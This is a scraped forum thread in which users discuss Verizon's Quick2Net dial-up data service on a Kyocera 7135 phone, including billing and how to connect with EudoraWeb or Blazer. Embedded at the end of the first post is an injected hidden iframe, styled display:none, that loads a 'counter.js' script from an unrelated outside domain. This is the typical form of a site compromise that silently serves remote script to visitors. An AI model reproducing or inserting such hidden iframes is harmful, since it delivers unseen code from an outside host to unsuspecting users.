VZW Quick 2 Net

I've only had my phone a couple of days, and tried to use it to dial up into my local ISP with no luck. Then I tried dialing up using the VZW Quick2Net network that was already installed on my phone, and it connected and I am able to browse the net and pick up my POP3 email. I am using Verizon for the Cellular service, but have not signed up for any internet or data services. Anybody know anything about this...such as, are they going to try to bill me for this later?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No, you will not be billed for it later. The Q2N service is just basic 14.4kbps service and thus will just simply deduct from your minutes whenever you use it (like a voice call). There are no extra fees.

VZW Quick2Net network

After reading the reviews, I decided to purchase the 7135. By the way, great forum... and thanks to everyone that posted.

Question:

Can not get my phone to browse the web. Is there a special setup that I need to do?

What is this VZW Quick2Net network? I spoke with a some of the customer rep. over the phone and they don't know any about it? They say that in order for me to surf the web I will need to purchase the $4.99 a month web enable service.

Please advise.... Thanks.

You should be able to use Quick2Net and any browser like EudoraWeb or Blazer to surf. Go into PDA Prefs - Network and make sure you have Quick2Net selected, then click Connect. This should get you online, then go back to Main and run EudoraWeb and you should be all set. Quick2Net usage just comes out of your regular plan minutes, there's no extra charge.

The $4.99 thing is called Mobile Web and it lets you use the WAP browser, prosaically called 'Browser'. This is a whole different thing that many people probably don't need if you have access to a real web browser, it's more for regular phones that only have an 8-or-so-line text display.
